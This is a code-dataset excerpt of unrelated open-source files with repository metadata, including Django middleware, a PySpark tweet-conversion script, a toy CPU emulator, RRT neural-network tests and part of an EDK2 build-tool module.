d932577fc1d8b71405a05fa54c4ae2ec74119e08 | fe6f6d11dde2a3205ae9758c7d4eb1f824b84102 | /venv/lib/python2.7/site-packages/pylint/test/input/func___name___access.py | def867475829143945bd7552ef152ca874170278 | [
"MIT"
] | permissive | mutaihillary/mycalculator | ebf12a5ac90cb97c268b05606c675d64e7ccf8a6 | 55685dd7c968861f18ae0701129f5af2bc682d67 | refs/heads/master | 2023-01-10T14:56:11.780045 | 2016-09-20T12:30:21 | 2016-09-20T12:30:21 | 68,580,251 | 0 | 0 | MIT | 2022-12-26T20:15:21 | 2016-09-19T07:27:48 | Python | UTF-8 | Python | false | false | 515 | py | # pylint: disable=R0903,W0142
"""test access to __name__ gives undefined member on new/old class instances
but not on new/old class object
"""
__revision__ = 1
class Aaaa:
"""old class"""
def __init__(self):
print self.__name__
print self.__class__.__name__
class NewClass(object):
"""new class"""
def __new__(cls, *args, **kwargs):
print 'new', cls.__name__
return object.__new__(cls, *args, **kwargs)
def __init__(self):
print 'init', self.__name__
| [
"mutaihillary@yahoo.com"
] | mutaihillary@yahoo.com |
4f53587d3e9d9640509c3d4b527244d390f9eb51 | 56113bfe5f1c70e99039d0dc4ac6f4e3286b56ef | /infer/model.py | 84352d474edbe1c44169d07796a4cef62d83bfd0 | [] | no_license | rlouf/mcx-infer | 1d12a163b7007cb3f913a3a65e1381c5b2aed840 | a1e46bc62dc829c4247e3557a1e41d933611db16 | refs/heads/master | 2023-03-03T05:57:01.224271 | 2021-02-08T10:03:51 | 2021-02-08T10:03:51 | 300,554,327 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,589 | py | from abc import ABC, abstractproperty, abstractmethod
import jax
import mcx
class Model(ABC):
def __init__(self):
self.rng_key = jax.random.PRNGKey(0)
self.trace = None
def __repr__(self):
return self.math_repr
def prior_predict(self, *args, num_samples=1000, **kwargs):
"""We should also be able to pass the data as simple args"""
return mcx.predict(self, self.model)(**kwargs)
def predict(self, *args, num_samples=1000, **kwargs):
"""We should also be able to pass the data as simple args"""
if not self.trace:
raise ValueError("""You must run the `.fit` method before being able to make predictions. Maybe you were looking for `prior_predict`?""")
return mcx.predict(self, self.model, self.trace)(**kwargs)
@abstractmethod
def fit(self):
pass
def _fit(self, kernel, num_samples=1000, accelerate=True, **observations):
"""While it impossible to provide a universal fitting mechanism, some
are certainly better than others.
"""
_, self.rng_key = jax.random.split(self.rng_key)
sampler = mcx.sampler(
self.rng_key,
self.model,
kernel,
**observations,
)
trace = sampler.run(1000, accelerate)
self.sampler = sampler
self.trace = trace
return trace
@abstractproperty
def model(self):
pass
@abstractproperty
def math_repr(self):
pass
@abstractproperty
def graph(self):
pass
| [
"remilouf@gmail.com"
] | remilouf@gmail.com |
2e2bdefe2b4e3ce8514dd285194ed6d9f43863bd | 74b6523512f17f4c18096b956e4c3c074b53cf4c | /myNews.py | 3170f0ec9c830c21762b973cc0dd598006213758 | [] | no_license | howie6879/getNews | f7fdbd310c0e48a8a2c74504aa27893d25354ba1 | ab5ad56c8520e60d5f568deed0081dfc127b7cd9 | refs/heads/master | 2020-05-21T23:49:40.805281 | 2017-04-02T03:51:33 | 2017-04-02T03:51:33 | 59,347,631 | 49 | 23 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | """myNews
Usage: myNews [-p] <port>
Options:
-h,--help 显示帮助菜单
-p 端口号
Example:
myNews -p 8888 设置端口号为8888
"""
from docopt import docopt
from server import main
def cli():
kwargs = docopt(__doc__)
port = kwargs['<port>']
main(port)
if __name__ == "__main__":
cli()
| [
"xiaozizayang@gmail.com"
] | xiaozizayang@gmail.com |
71039b5129c2b132a82935c0dc011e70fb6812f2 | b44bd5b2a620d9f36e5d9528326595382ce6f25a | /coffeestats/caffeine/middleware.py | 98675006101fd71c091f82dcbfec108cf125cadc | [
"MIT"
] | permissive | coffeestats/coffeestats-django | 993f8cf1ad91c698ed12441afd57c4fa481583a4 | 8982dc736261ab3cbe0f3e1d94da40bb03cd8ff3 | refs/heads/master | 2021-01-17T07:20:04.472876 | 2019-12-21T12:30:51 | 2019-12-21T12:30:51 | 19,642,292 | 6 | 1 | MIT | 2019-12-21T12:32:03 | 2014-05-10T13:39:20 | Python | UTF-8 | Python | false | false | 1,118 | py | from django.conf import settings
from django.http import HttpResponseRedirect
from django.urls import reverse
from django.utils.http import urlquote_plus
class EnforceTimezoneMiddleware:
"""
Middleware to enforce that users have a time zone set.
"""
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
"""
Redirects to the time zone selection vie and passes the originally
requested URL to that view if the current user does not have a time
zone set.
:param HttpRequest request: the current request
:return: redirect or None
"""
timezone_path = reverse('select_timezone')
if (request.user.is_authenticated and
not request.user.timezone and
not request.path.startswith(settings.STATIC_URL) and
not request.path.startswith(timezone_path)):
return HttpResponseRedirect(
timezone_path + '?next=' +
urlquote_plus(request.get_full_path()))
return self.get_response(request)
| [
"jan@dittberner.info"
] | jan@dittberner.info |
f45649d716fc9a7197fa3b7b160997ad00f2bc7e | 6cb5155c882d4536b7283a623763801d9003ecec | /djproject/djproject/urls.py | df1749cf27e0ad7988ed6e84ce592d3bf6affe94 | [] | no_license | prathmeshdjango/djangoproject1 | e16f7ef9d6f87a084d258c2cb2fd2c4a0db7304f | 100ac1c5949966a51074d39cc3a019fef1d27976 | refs/heads/main | 2023-01-14T10:28:30.737383 | 2020-11-23T06:00:42 | 2020-11-23T06:00:42 | 315,217,321 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,015 | py | """djproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from testapp import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.index),
url(r'^hydjobs/', views.hydjobs1),
url(r'^blorejobs/', views.blorejobs),
url(r'^punejobs/', views.punejobs),
url(r'^chennaijobs/', views.chennaijobs),
]
| [
"prathmeshamahajan03@gmail.com"
] | prathmeshamahajan03@gmail.com |
3185803f84e25e30cfede19a48ec5f8a17fe442a | 0a4019acdfcfbcdd8077dd3a5d75327189056af7 | /spark/06GNIPDataGroupByRuleTag-Spark.py | b752a79c0f56a53e3fb51e29df5e6e8a548805a7 | [] | no_license | lin1000/TwitterPublicAPI | 0294a75c4194f14dbc1fd493a3bf977ace5a8957 | 82feede9e2ec41c912a2cf4aa8759563b676826e | refs/heads/master | 2021-01-23T04:28:33.798681 | 2019-02-21T15:03:33 | 2019-02-21T15:03:33 | 92,928,432 | 0 | 0 | null | 2017-10-08T06:29:56 | 2017-05-31T09:19:35 | Python | UTF-8 | Python | false | false | 9,698 | py | import sys
from pyspark import SparkContext, SparkConf
import glob
from os.path import basename
from os.path import splitext
import json
from pyspark.sql import SQLContext
import format.tweet as tw
def gnip_2_csv(gniptweet):
# Skip no tweet_id and handle
if not gniptweet.has_key('id'):
return
if not gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
return
# Twitter
tweet = tw.FIELDS()
tweet.DOCUMENT_ID = gniptweet['id']
## Use Handle name as AUTHOR_ID
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
tweet.AUTHOR_ID = gniptweet['actor']['preferredUsername']
else:
tweet.AUTHOR_ID = ''
tweet.SOURCE_NAME = 'Twitter'
if gniptweet.has_key('link'):
tweet.URL = gniptweet['link']
else:
tweet.URL = ''
if (gniptweet.has_key('verb') and gniptweet['verb'].find('share') != -1) or (
gniptweet.has_key('verb') and gniptweet['verb'].find('post') != -1 and gniptweet.has_key(
'inReplyTo')):
tweet.IS_COMMENT = 1
else:
tweet.IS_COMMENT = 0
#gniptime = gniptweet['postedTime']
#pytime = time.strptime(gniptime, '%Y-%m-%dT%H:%M:%S.000Z')
tweet.POST_TIMESTAMP = gniptweet['postedTime']
if gniptweet.has_key('body'):
tweet.CONTENT = gniptweet['body']
else:
tweet.CONTENT = ''
if gniptweet.has_key('twitter_lang'):
tweet.LANGUAGE = gniptweet['twitter_lang']
else:
tweet.LANGUAGE = ''
if gniptweet.has_key('location') and gniptweet['location'].has_key('displayName'):
tweet.LOCATION_NAME = gniptweet['location']['displayName']
else:
tweet.LOCATION_NAME = ''
if gniptweet.has_key('location') and gniptweet['location'].has_key('twitter_country_code'):
tweet.COUNTRY_CODE = gniptweet['location']['twitter_country_code']
else:
tweet.COUNTRY_CODE = ''
if gniptweet.has_key('geo') and gniptweet['geo'].has_key('coordinates'):
tweet.GEO_COORDINATES = str(gniptweet['geo']['coordinates'][1]) + ',' + str(
gniptweet['geo']['coordinates'][0])
else:
tweet.GEO_COORDINATES = ''
if tweet.GEO_COORDINATES == '':
if gniptweet.has_key('location'):
if gniptweet['location'].has_key('geo'):
if gniptweet['location']['geo'] is not None:
if gniptweet['location']['geo'].has_key('coordinates') and gniptweet['location']['geo']['type'].find('Polygon') != -1:
xaix = (gniptweet['location']['geo']['coordinates'][0][0][0] +
gniptweet['location']['geo']['coordinates'][0][1][0] +
gniptweet['location']['geo']['coordinates'][0][2][0] +
gniptweet['location']['geo']['coordinates'][0][3][0]) / 4
yaix = (gniptweet['location']['geo']['coordinates'][0][0][1] +
gniptweet['location']['geo']['coordinates'][0][1][1] +
gniptweet['location']['geo']['coordinates'][0][2][1] +
gniptweet['location']['geo']['coordinates'][0][3][1]) / 4
tweet.GEO_COORDINATES = str(xaix) + ',' + str(yaix)
else:
tweet.GEO_COORDINATES = ''
# Author
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('id'):
tweet.AUTHOR_NAME = gniptweet['actor']['id']
else:
tweet.AUTHOR_NAME = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('preferredUsername'):
tweet.AUTHOR_ID = gniptweet['actor']['preferredUsername']
else:
tweet.AUTHOR_ID = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('displayName'):
tweet.AUTHOR_NICKNAME = gniptweet['actor']['displayName']
else:
tweet.AUTHOR_NICKNAME = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('link'):
tweet.AUTHOR_URL = gniptweet['actor']['link']
else:
tweet.AUTHOR_URL = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('image'):
tweet.AUTHOR_AVATAR_URL = gniptweet['actor']['image']
else:
tweet.AUTHOR_AVATAR_URL = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('location') and gniptweet['actor'][
'location'].has_key('displayName'):
tweet.AUTHOR_LOCATION = gniptweet['actor']['location']['displayName']
else:
tweet.AUTHOR_LOCATION = ''
tweet.SOURCE_NAME = 'Twitter'
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('friendsCount'):
tweet.FRIENDS_COUNT = gniptweet['actor']['friendsCount']
else:
tweet.FRIENDS_COUNT = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('followersCount'):
tweet.FOLLOWERS_COUNT = gniptweet['actor']['followersCount']
else:
tweet.FOLLOWERS_COUNT = ''
if gniptweet['gnip'].has_key('klout_score'):
tweet.KLOUT_SCORE = str(gniptweet['gnip']['klout_score'])
else:
tweet.KLOUT_SCORE = ''
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('favoritesCount'):
tweet.FAVORITES_COUNT = gniptweet['actor']['favoritesCount']
else:
tweet.FAVORITES_COUNT = 0
if gniptweet.has_key('actor') and gniptweet['actor'].has_key('listedCount'):
tweet.LISTED_COUNT = gniptweet['actor']['listedCount']
else:
tweet.LISTED_COUNT = 0
if gniptweet.has_key('inReplyTo') and gniptweet['inReplyTo'].has_key('link'):
tweet.IN_REPLAT_TO_URL = gniptweet['inReplyTo']['link']
else:
tweet.IN_REPLAT_TO_URL = ''
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('hashtags'):
cnt = 0
for tag in gniptweet['twitter_entities']['hashtags']:
tweet.HASH_TAGS.append(tag['text'])
cnt = cnt + 1
if cnt >= 10:
break
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('urls'):
cnt = 0
for url in gniptweet['twitter_entities']['urls']:
tweet.URL_MENTIONS.append(url['url'])
cnt = cnt + 1
if cnt >= 10:
break
if gniptweet.has_key('twitter_entities') and gniptweet['twitter_entities'].has_key('user_mentions'):
cnt = 0
for mention in gniptweet['twitter_entities']['user_mentions']:
tweet.USER_MENTIONS.append(mention['screen_name'])
cnt = cnt + 1
if cnt >= 10:
break
return tweet.toCSVLine()
def test_if_dict_contain_rule_tag(mydict,rule_tag):
#print "comparing mydict(%s) with %s" % (len(mydict),rule_tag)
for tagline in mydict:
if("tag" in tagline and tagline['tag']==rule_tag):
#print "TAG FOUND"
return True
#print "TAG MISS"
return False
def group_by_rule_tag(rule_tag_list=[]):
datafiles = "../python/05GNIPData/*.json.gz"
# datafiles = "../python/05GNIPData/20160601-20170601_avgg5v796n_2016_06_01_00_*_activities.json.gz"
filenames = glob.glob(datafiles)
outputfilepath = "../spark/06GNIPDataGroupByRuleTag/"
dataRDD = sc.textFile(datafiles).map(lambda x : json.loads(x))
print "Loaded %s json records" % (dataRDD.count())
#dataRDD.persist()
for rule_tag in rule_tag_list:
#print dataRDD.map(lambda d: d.keys()).collect()
#print dataRDD.flatMap(lambda d: d.keys()).distinct().collect()
#print dataRDD.map(lambda tweet: (len(tweet.keys()),1)).reduceByKey(lambda x, y: x + y).collect()
#print dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupByKey().saveAsTextFile(outputfilepath)
#try to groupBy or groupByKey
#groupByRuleTag = dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupBy(lambda (k,vs): k,1)
groupByRuleTag = dataRDD.filter(lambda t: "body" in t).filter(lambda t: test_if_dict_contain_rule_tag(t['gnip']['matching_rules'],rule_tag)).map(lambda t: gnip_2_csv(t))
#save filtered result into files
groupByRuleTag.saveAsTextFile(outputfilepath + "/" + rule_tag)
#load as sparkSQL dataframe
#df = sqlContext.read.json(groupByRuleTag)
#df.registerTempTable(rule_tag)
#df_result = sqlContext.sql("SELECT _corrupt_record as spark_tweet FROM "+rule_tag)
#df_result.write.json(rule_tag+".json")
#groupByRuleTag_list = [ t for t in groupByRuleTag.collect()]
#for tag in groupByRuleTag_list:
#print "%s %s" % (tag[0],len(tag[1]))
#print dataRDD.filter(lambda t: "body" in t).map(lambda t : (t['gnip']['matching_rules'][0]['tag'],t)).groupByKey(3).map(lambda (k,vs): (k,len(vs))).saveAsTextFile(outputfilepath)
#dataRDD.persist()
#print dataRDD.count()
#print dataRDD.take(1)
#print dataRDD.map(lambda tweet: type(tweet)).collect()
#dataRDD.take(10)
#group_by_rule_tags_json = {u'group_by_rule_tags': [] }
# for filename in filenames:
# base = basename(filename)
# (fname,extname) = splitext(base)
# print "Preparing to load %s" % (base)
# dataRDD = sc.textFile(datafiles)
# print dataRDD.take(1)
#numA = dataRDD.filter(lambda s: 'tony' in s).count()
#numB = dataRDD.filter(lambda s: 'mary' in s).count()
#print "Lines with tony : %s , lines with mary: %s" % (numA,numB)
if __name__=='__main__':
conf = SparkConf().setAppName("Read entire json activities app by pyspark")
sc = SparkContext(conf=conf)
sqlContext = SQLContext(sc)
group_by_rule_tag(['modelpress','kenichiromogi','HikaruIjuin'])
sc.stop()
| [
"lin1000@gmail.com"
] | lin1000@gmail.com |
cec45328cdf57a5676db59114e7172432441f9d4 | 718260336685a52961108a305ad81a85f05402d6 | /GP/simple_machine_01.py | 9d7d66135a4efcd6a39fa78665ad9e2d13f565bf | [] | no_license | gmgower/https-github.com-LambdaSchool-Computer-Architecture | 4aae4259602498cfdb28d1e408bb85d263038844 | 5c122b7e19451dff2efdb49fad029a3cb7d7ec62 | refs/heads/master | 2022-12-28T08:30:25.786494 | 2020-10-09T03:52:45 | 2020-10-09T03:52:45 | 299,478,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,355 | py | import sys
PRINT_TIM = 0b00000001
HALT = 0b00000010
PRINT_NUM = 0b01000011
SAVE = 0b10000100 # LDI
PRINT_REGISTER = 0b01000101
ADD = 0b10000110
memory = [0] * 256
def load_memory():
if (len(sys.argv)) != 2:
print("remember to pass the second file name")
print("usage: python3 fileio.py <second_file_name.py>")
sys.exit()
address = 0
try:
with open(sys.argv[1]) as f:
for line in f:
# parse the file to isolate the binary opcodes
possible_number = line[:line.find('#')]
if possible_number == '':
continue # skip to next iteration of loop
instruction = int(possible_number, 2)
memory[address] = instruction
except FileNotFoundError:
print(f'Error from {sys.argv[0]}: {sys.argv[1]} not found')
sys.exit()
load_memory()
# cabinets in your shop: registers
# storage unit: cache
# warehouse outside town: RAM
# registers
# physically located on CPU, treat as variables
# R0-R7
registers = [0] * 8
# cpu should now step through memory and take actions based on commands it finds
# a data-driven machine
# program counter, a pointer
pc = 0
running = True
while running:
command = memory[pc]
num_args = command >> 6
if command == PRINT_TIM:
print("tim!")
elif command == PRINT_NUM:
number = memory[pc + 1]
print(number)
elif command == SAVE:
# get out the arguments
# pc+1 is reg idx, pc+2 value
reg_idx = memory[pc + 1]
value = memory[pc + 2]
# put the value into the correct register
registers[reg_idx] = value
elif command == PRINT_REGISTER:
# get out the argument
reg_idx = memory[pc + 1]
# the argument is a pointer to a register
value = registers[reg_idx]
print(value)
elif command == ADD:
# pull out the arguments
reg_idx_1 = memory[pc + 1]
reg_idx_2 = memory[pc + 2]
# add regs together
registers[reg_idx_1] = registers[reg_idx_1] + registers[reg_idx_2]
elif command == HALT:
running = False
else:
print('unknown command!')
running = False
pc += 1 + num_args | [
"gmgower@gmail.com"
] | gmgower@gmail.com |
e8effc6917de42d5c0e65db39dda12ac46e9f5b9 | 6f4e4b647df1bca98ce298e99d3e9adf3379914f | /modeltest.py | 11cabcdf7ef190f6194ed11ee7a2060465e8190e | [] | no_license | ShiqiSun/RRTNN | 358680f25f8e1981f84ba088c6b3d31556a93b31 | f0120a83851eaaa55375d153d904723c964cc371 | refs/heads/master | 2022-12-01T10:01:02.364447 | 2020-08-09T01:24:26 | 2020-08-09T01:24:26 | 281,417,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,083 | py | from keras.models import load_model
import numpy as np
from RRT.src.utilities.plotting import Plot
from RRT.src.search_space.search_space import SearchSpace
from region import *
def testmodel_fromzero(path, xinit, yinit):
x_up_bound = 60 # 120
x_low_bound = 0
y_up_bound = 60 # 120
y_low_bound = 0
model = load_model(path)
x_init = (xinit, yinit)
x_goal = (30, 60) # goal location(100, 100)
X_dimensions = np.array([(x_low_bound, x_up_bound), (y_low_bound, y_up_bound)]) # dimension of serach space
Obstacles = np.array([(0, 0, 20, 20), (0, 40, 20, 60),
(40, 0, 60, 20), (40, 40, 60, 60)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_position = np.zeros((1, 2))
x_position[0][0] = xinit
x_position[0][1] = yinit
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
for i in range(100):
# print(x_position)
y_pred = model.predict(x_position)
print(y_pred)
# breakpoint()
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if x_position[0][0] > x_up_bound or x_position[0][1] > y_up_bound or x_position[0][0] < x_low_bound or x_position[0][1] < y_low_bound:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
def testmodel_random(path):
model = load_model(path)
# Define size of environment
x_up_bound = 120
x_low_bound = 0
y_up_bound = 120
y_low_bound = 0
x_goal = (100, 100)
X_dimensions = np.array([(0, 120), (0, 120)]) # dimension of serach space
Obstacles = np.array([(20, 20, 40, 40), (20, 60, 40, 80),
(60, 20, 80, 40), (60, 60, 80, 80)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
while is_Obstacle(x_init, Obstacles):
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
x_position = np.zeros((1, 2))
x_position[0][0] = x_init[0]
x_position[0][1] = x_init[1]
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
while True:
y_pred = model.predict(x_position)
print(y_pred)
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if testregion(position, x_goal, 3):
break
if x_position[0][0] > 120 or x_position[0][1] > 120 or x_position[0][0] < 0 or x_position[0][1] < 0:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
def testmodel_random_nolimit(path):
model = load_model(path)
# Define size of environment
x_up_bound = 60 # 120
x_low_bound = 0
y_up_bound = 60 #120
y_low_bound = 0
# x_goal = (100, 100)
#
# X_dimensions = np.array([(0, 120), (0, 120)]) # dimension of serach space
# Obstacles = np.array([(20, 20, 40, 40), (20, 60, 40, 80),
# (60, 20, 80, 40), (60, 60, 80, 80)]) # obstacles
x_goal = (30, 60) # goal location(100, 100)
X_dimensions = np.array([(x_low_bound, x_up_bound), (y_low_bound, y_up_bound)]) # dimension of serach space
Obstacles = np.array([(0, 0, 20, 20), (0, 40, 20, 60),
(40, 0, 60, 20), (40, 40, 60, 60)]) # obstacles
X = SearchSpace(X_dimensions, Obstacles)
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
while is_Obstacle(x_init, Obstacles):
x_init = (random.randrange(x_low_bound, x_up_bound), random.randrange(y_low_bound, y_up_bound))
x_position = np.zeros((1, 2))
x_position[0][0] = x_init[0]
x_position[0][1] = x_init[1]
path = list()
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
for i in range(100):
y_pred = model.predict(x_position)
print(y_pred)
x_position = y_pred
position = [x_position[0][0], x_position[0][1]]
x_temp = (x_position[0][0], x_position[0][1])
path.append(x_temp)
if x_position[0][0] > x_up_bound or x_position[0][1] > y_up_bound or x_position[0][0] < x_low_bound or x_position[0][1] < y_low_bound:
break
print("Final position is", x_position)
plot = Plot("rrt_2d")
plot.plot_path(X, path)
plot.plot_obstacles(X, Obstacles)
plot.plot_start(X, x_init)
plot.plot_goal(X, x_goal)
plot.draw(auto_open=True)
del model
| [
"shiqi.sun@duke.edu"
] | shiqi.sun@duke.edu |
9fdb4d019b5ec120c7bd4c3cbe140bf7023e5911 | e32801b4debf07340b98255eb35e2c41ba2d2bb5 | /scripts/addons_extern/animation_nodes_master/nodes/spline/spline_info.py | 83687abbd74969916131dea3e58cb5731c0728d3 | [
"LicenseRef-scancode-warranty-disclaimer"
] | no_license | JuhaW/blenderpython | 8c7130484690339c06f85b740c2f9e595b34a9dc | ee7b3a9f9d8cfbea32258e7ff05c3cb485a8879a | refs/heads/master | 2021-07-21T23:59:42.476215 | 2017-10-25T08:42:04 | 2017-10-25T08:42:04 | 108,861,751 | 1 | 0 | null | 2017-10-30T14:25:14 | 2017-10-30T14:25:14 | null | UTF-8 | Python | false | false | 505 | py | import bpy
from ... base_types.node import AnimationNode
class SplineInfoNode(bpy.types.Node, AnimationNode):
bl_idname = "an_SplineInfoNode"
bl_label = "Spline Info"
def create(self):
self.newInput("Spline", "Spline", "spline", defaultDrawType = "PROPERTY_ONLY")
self.newOutput("Vector List", "Points", "points")
self.newOutput("Boolean", "Cyclic", "cyclic")
def execute(self, spline):
spline.update()
return spline.getPoints(), spline.isCyclic
| [
"meta.androcto1@gmail.com"
] | meta.androcto1@gmail.com |
81e0e271bc79314d2a63e264a4fb2ebf926e3631 | 7ae6e33e978e214002f94aa9fa473783bdb1a7d7 | /distgan/distgan.py | 40cd76b250945a753ab1dadb00d68349d796407d | [] | no_license | archmaester/gan-zoo | c7e63c128f1e83e6d3181f40963d7c296becf86e | 36eef93dffe949219d9ca782c765ca7c6b4c0fec | refs/heads/master | 2020-04-07T21:47:20.284235 | 2018-12-26T06:35:08 | 2018-12-26T06:35:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,309 | py | import tensorflow as tf
from data_loader.data_utils_sine import Data
from models.model_distgan_sine import Model
from trainers.trainer import Trainer
from evaluate.evaluator import Evaluator
from settings.config_sine import load_settings_from_file
from utils.dirs import create_dirs
from utils.logger import Logger
from utils.plot_sine import Plot
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
session_conf = tf.ConfigProto(allow_soft_placement = True, log_device_placement = False)
session_conf.gpu_options.allow_growth = True
def main():
# PROLOG
settings = load_settings_from_file()
# Create directories
create_dirs(settings['dir_root'])
# Create Tensorflow Session
sess = tf.Session(config = session_conf)
# Create the data generator
data = Data(settings)
# Create Model
model = Model(settings)
# Create tensorflow Logging
logger = Logger(sess, settings)
#Creating plots
plot = Plot(sess, settings)
sess.run(tf.global_variables_initializer())
# Create trainer object
trainer = Trainer(sess, model, data, settings, logger, plot)
# Train the model
trainer.train_epoch()
#Evaluate the model
trainer.evaluate()
if __name__ == '__main__':
main() | [
"keswanimonish@yahoo.com"
] | keswanimonish@yahoo.com |
78d77000f9044e59818d10fa6c44a41334a60c95 | 419fe1725040d83075a4983986f500d75e098564 | /Sort/LargestNumber.py | 56b625f5c0cc12aad379bb9a132b44c6fcb0f9ec | [] | no_license | snanoh/Python-Algorithm-Study | 66a2f258b0b215f4047574d29780c54fb2b34643 | c529088d32a2692f38071ed0d18c198543b6b9de | refs/heads/main | 2023-03-22T03:27:15.914974 | 2021-02-18T12:41:16 | 2021-02-18T12:41:16 | 319,297,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | from typing import List
def to_swap(n1: int, n2: int) -> bool:
return str(n1) + str(n2) < str(n2) + str(n1)
# 삽입 정렬 구현
def largestNumber( nums: List[int]) -> str:
i = 1
while i < len(nums):
j = i
while j > 0 and to_swap(nums[j - 1], nums[j]):
nums[j], nums[j - 1] = nums[j - 1], nums[j]
j -= 1
i += 1
return str(int(''.join(map(str, nums))))
nums = [3, 30, 34, 5, 9]
print(largestNumber(nums))
| [
"njs1324@gmail.com"
] | njs1324@gmail.com |
61c6ccd66c69dcc38f504e14f4d66366d9bc51e6 | b8f4b32171bba9e60a101f5a605e084c9aa974fd | /BaseTools/Source/Python/Workspace/InfBuildData.py | 7675b0ea00ebd6a5fc3e823c965e32066f66f650 | [
"BSD-3-Clause",
"BSD-2-Clause-Patent"
] | permissive | jinjhuli/slimbootloader | 3137ab83073865b247f69b09a628f8b39b4c05ee | cfba21067cf4dce659b508833d8c886967081375 | refs/heads/master | 2023-07-11T12:59:51.336343 | 2020-09-11T00:16:48 | 2020-09-11T00:24:52 | 149,729,121 | 1 | 0 | BSD-2-Clause | 2018-09-21T07:49:42 | 2018-09-21T07:49:42 | null | UTF-8 | Python | false | false | 48,567 | py | ## @file
# This file is used to create a database used by build tool
#
# Copyright (c) 2008 - 2018, Intel Corporation. All rights reserved.<BR>
# (C) Copyright 2016 Hewlett Packard Enterprise Development LP<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
from __future__ import absolute_import
from Common.DataType import *
from Common.Misc import *
from Common.caching import cached_property, cached_class_function
from types import *
from .MetaFileParser import *
from collections import OrderedDict
from Workspace.BuildClassObject import ModuleBuildClassObject, LibraryClassObject, PcdClassObject
## Get Protocol value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def _ProtocolValue(CName, PackageList, Inffile = None):
for P in PackageList:
ProtocolKeys = list(P.Protocols.keys())
if Inffile and P._PrivateProtocols:
if not Inffile.startswith(P.MetaFile.Dir):
ProtocolKeys = [x for x in P.Protocols if x not in P._PrivateProtocols]
if CName in ProtocolKeys:
return P.Protocols[CName]
return None
## Get PPI value from given packages
#
# @param CName The CName of the GUID
# @param PackageList List of packages looking-up in
# @param Inffile The driver file
#
# @retval GuidValue if the CName is found in any given package
# @retval None if the CName is not found in all given packages
#
def _PpiValue(CName, PackageList, Inffile = None):
for P in PackageList:
PpiKeys = list(P.Ppis.keys())
if Inffile and P._PrivatePpis:
if not Inffile.startswith(P.MetaFile.Dir):
PpiKeys = [x for x in P.Ppis if x not in P._PrivatePpis]
if CName in PpiKeys:
return P.Ppis[CName]
return None
## Module build information from INF file
#
# This class is used to retrieve information stored in database and convert them
# into ModuleBuildClassObject form for easier use for AutoGen.
#
class InfBuildData(ModuleBuildClassObject):
# dict used to convert PCD type in database to string used by build tool
_PCD_TYPE_STRING_ = {
MODEL_PCD_FIXED_AT_BUILD : TAB_PCDS_FIXED_AT_BUILD,
MODEL_PCD_PATCHABLE_IN_MODULE : TAB_PCDS_PATCHABLE_IN_MODULE,
MODEL_PCD_FEATURE_FLAG : TAB_PCDS_FEATURE_FLAG,
MODEL_PCD_DYNAMIC : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_DEFAULT : TAB_PCDS_DYNAMIC,
MODEL_PCD_DYNAMIC_HII : TAB_PCDS_DYNAMIC_HII,
